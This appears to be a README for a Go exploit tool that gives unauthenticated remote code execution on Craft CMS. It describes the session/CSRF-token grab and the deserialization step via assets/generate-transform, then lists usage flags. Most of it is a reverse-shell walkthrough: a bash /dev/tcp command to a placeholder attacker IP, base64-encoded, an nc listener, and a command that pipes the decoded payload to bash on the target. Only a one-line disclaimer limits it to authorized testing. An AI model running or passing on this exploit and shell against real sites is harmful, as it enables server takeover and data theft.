用于在 Craft CMS 上实现未授权远程代码执行(RCE)的 Exploit,使用 Go 编写。
灵感来源于 c0gnit00 的原创工作。
GET /admin/login 获取 PHP 会话和 CSRF tokenassets/generate-transform 触发反序列化,以包含并执行被污染的文件go run main.go -u <url> -c <comando>
| Flag | 描述 | 必需 |
|---|---|---|
-u | 目标 URL(例如:http://target.com) | 是 |
-c | 要执行的命令(例如:id、whoami) | 是 |
# Sem Asset ID (brute-force automático)
go run main.go -u http://target.com -c whoami
1. 使用你的 IP 和端口生成 base64 payload:
echo 'exec sh -i >& /dev/tcp/SEU_IP/4444 0>&1' | base64
2. 开启监听:
nc -lvnp 4444
3. 使用 payload 运行 exploit:
go run main.go -u http://target.com -c "echo 'ZXhlYyBzaCAtaSA+JiAvZGV2L3RjcC9TRVVfSVAvNDQ0NCAwPiYxCg==' | base64 -d | bash"
请将 base64 值替换为第 1 步中使用你的真实 IP 生成的内容。
仅供在授权环境和受控安全测试中使用。